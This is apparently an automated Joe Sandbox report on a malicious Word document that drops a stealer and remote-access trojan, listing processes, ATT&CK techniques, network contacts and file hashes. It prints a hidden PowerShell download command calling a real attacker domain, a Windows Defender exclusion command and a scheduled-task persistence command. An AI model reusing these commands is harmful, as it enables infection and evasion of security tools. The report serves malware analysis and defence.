          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Program Manager
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: J Program Managerr_
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
          Source: explorer.exe, 00000014.00000002.994309984.0000000005DA9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: procdump.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed by tactic column (a number before a technique is the report's signature-count badge for that cell, kept as printed):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: 2 Scripting, 1 Shared Modules, 33 Exploitation for Client Execution, 11 Command and Scripting Interpreter, 1 Scheduled Task/Job, 3 PowerShell, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
Persistence: 1 Scheduled Task/Job, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
Privilege Escalation: 412 Process Injection, 1 Scheduled Task/Job, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
Defense Evasion: 11 Disable or Modify Tools, 2 Scripting, 1 Obfuscated Files or Information, 11 Software Packing, 1 Timestomp, 13 Masquerading, 21 Virtualization/Sandbox Evasion, 412 Process Injection, 1 Hidden Files and Directories, 1 Hidden Users
Credential Access: 11 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: 2 File and Directory Discovery, 13 System Information Discovery, 211 Security Software Discovery, 2 Process Discovery, 21 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 Remote System Discovery, Network Service Scanning, System Network Connections Discovery, Process Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
Collection: 1 Archive Collected Data, 11 Input Capture, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: 2 Ingress Tool Transfer, 1 Encrypted Channel, 1 Non-Standard Port, 2 Non-Application Layer Protocol, 112 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: 1 Endpoint Denial of Service, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact
Behavior Graph (ID: 708250; sample: Item Selection - Inquiry 00...; start date: 23/09/2022; architecture: WINDOWS; score: 100)

Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 17 other signatures

Process tree (bracketed numbers are the graph's per-process counts, kept as printed; per the graph legend they are created registry values and created files):

WINWORD.EXE [301 46]
  DNS/IP: login.929389.ankura.us (159.223.2.212), ports 49171, 49172, 80, CELANESE-US, United States
  Dropped: C:\Users\user\AppData\...\explorer[1].exe (PE32); C:\Users\user\AppData\...\DZdtfhgYgeghD{ .scT (data); C:\Users\user\AppData\Local\...\CA1522E6.png (370)
  Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); 2 other signatures
  Started: cmd.exe; cmd.exe; cmd.exe; 5 other processes

cmd.exe (first) -> explorer.exe [1 8]
  Dropped: C:\Users\user\AppData\...\eDdYRRbouy.exe (PE32); C:\Users\user\AppData\Local\...\tmpE14B.tmp (XML)
  Signatures: Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions
  Started: MSBuild.exe [3 2]; powershell.exe [6]; schtasks.exe; MSBuild.exe
    MSBuild.exe [3 2]
      DNS/IP: 20.126.95.155, ports 49173, 7800, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
      Signatures: Increases the number of concurrent connection per server for Internet Explorer; Hides that the sample has been downloaded from the Internet (zone.identifier)

cmd.exe (second) -> explorer.exe [2]
  Signatures: Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  Started: powershell.exe; schtasks.exe; MSBuild.exe

cmd.exe (third) -> explorer.exe
  Started: powershell.exe; 2 other processes

5 other processes (started by WINWORD.EXE)
  DNS/IP: login.929389.ankura.us
  Dropped: C:\Users\user\AppData\Roaming\explorer.exe (PE32)
  Signatures: Drops PE files with benign system names; Powershell drops PE file; Injects files into Windows application

Antivirus detection, submitted file (source; detection; scanner; label):
- Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc; 32%; ReversingLabs; Script.Exploit.CVE-2017-8570
- Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc; 51%; Virustotal (Browse)

Antivirus detection, dropped files (source; detection; scanner):
- C:\Users\user\AppData\Roaming\eDdYRRbouy.exe; 100%; Joe Sandbox ML
- C:\Users\user\AppData\Roaming\explorer.exe; 100%; Joe Sandbox ML
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe; 100%; Joe Sandbox ML

Antivirus detection, unpacked PE files (source; detection; scanner; label):
- 8.2.explorer.exe.3a2b638.11.unpack; 100%; Avira; TR/AD.MortyStealer.utbzg (Download File)
- 17.0.MSBuild.exe.400000.0.unpack; 100%; Avira; TR/Redcap.ghjpt (Download File)

Antivirus detection, domains: No Antivirus matches

Antivirus detection, URLs (source; detection; scanner; label):
- httP://login.929389.ank; 0%; Avira URL Cloud; safe
- http://login.929389.ankura.us; 0%; Avira URL Cloud; safe
- httP://login.929; 0%; Avira URL Cloud; safe
- httP://login.929389.ankura.us/Aw; 0%; Avira URL Cloud; safe
- 20.126.95.155; 0%; Avira URL Cloud; safe
Contacted domains (name; IP; active; malicious; antivirus detection; reputation):
- login.929389.ankura.us; 159.223.2.212; active: true; malicious: true; reputation: unknown

Contacted IPs without DNS name (name; malicious; antivirus detection; reputation):
- 20.126.95.155; malicious: true; Avira URL Cloud: safe; reputation: unknown

URLs from memory and binaries (name; source; malicious; antivirus detection; reputation):
- http://login.929389.ankura.us; source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
- http://www.piriform.com/ccleaner; source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp; malicious: false; reputation: high
- httP://login.929; source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp; malicious: true; Avira URL Cloud: safe; reputation: low
- httP://login.929389.ank; source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp; malicious: true; Avira URL Cloud: safe; reputation: unknown
- httP://login.929389.ankura.us/Aw; source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp; malicious: true; Avira URL Cloud: safe; reputation: unknown
- http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv; source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp; malicious: false; reputation: high
- https://github.com/syohex/java-simple-mine-sweeperC:; source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
- http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
Contacted public IPs (IP; domain; country; ASN; ASN name; malicious):
- 20.126.95.155; domain: unknown; United States; ASN 8075; MICROSOFT-CORP-MSN-AS-BLOCKUS; malicious: true
- 159.223.2.212; domain: login.929389.ankura.us; United States; ASN 46118; CELANESE-US; malicious: true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 708250
Start date and time: 2022-09-23 08:12:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.expl.evad.winDOC@43/31@2/2
EGA Information:
• Successful, ratio: 60%
HDC Information: Failed
                    HCA Information:
                    • Successful, ratio: 77%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Execution Graph export aborted for target MSBuild.exe, PID 2040 because there are no executed function
                    • Execution Graph export aborted for target powershell.exe, PID 1624 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
API interceptor events (time; type; description):
- 08:13:19; API Interceptor; 126x Sleep call for process: powershell.exe modified
- 08:13:32; API Interceptor; 477x Sleep call for process: explorer.exe modified
- 08:13:39; API Interceptor; 4x Sleep call for process: schtasks.exe modified
- 08:13:47; API Interceptor; 232x Sleep call for process: MSBuild.exe modified
- 08:14:29; API Interceptor; 1x Sleep call for process: notepad.exe modified
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                    Category:dropped
                    Size (bytes):3712
                    Entropy (8bit):5.0373299643815015
                    Encrypted:false
                    SSDEEP:48:PuWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fF:Ok7Hgwj+mbYf3LSrhlOs0f5aSdHn63DN
                    MD5:40A11389936D01876DE8991EE13B1DE9
                    SHA1:DF39D9926B2DB17D0A7E2153E6F5A31E14A7720A
                    SHA-256:FE9542C02AA1DE4322B580AA19D880DE54EE88F7D6280ADCB244FC2D9EAF45DE
                    SHA-512:8EB4AEB3008313A7B7A8BE1298F30CB09789F4F19008D8DE2D2D30C4F69C814A4C3871281590AC8E510AFEC0C2073D8DA6BCC2A0C2B494709214A0DD3DCF258A
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:370 sysV pure executable
                    Category:dropped
                    Size (bytes):262160
                    Entropy (8bit):0.029176838226622752
                    Encrypted:false
                    SSDEEP:12:dlL/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKE/Ws8GH:dlFsHT8v5GIw1Ew2sEi8+
                    MD5:E582F2A011171992316D5DAA68512ED7
                    SHA1:C71EEFB93628195D21512BBF499AFCC64BB42E33
                    SHA-256:2580C3E1913FBC5CE7F2E5D4F4349F2F130A3980B1A4D6E824883EC9120F903E
                    SHA-512:D2B16F427CF3D8F0D282CE00B3564F838E8153D4681C5EEEE648FA677CEC564C2EF2DC15D6144AB92E11C12C2A32395B4AE4C08A12580FEE4ECF9841C0E07651
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):47104
                    Entropy (8bit):5.2958250054182585
                    Encrypted:false
                    SSDEEP:768:2OwzakaBa9aRaOa2EgpvaPCOoYPW1+wnAn8rb8WkWDOwzakaBa9aRaOa2EgpvaPF:2OwzakaBa9aRaOa2EOLndkWDOwzakaBq
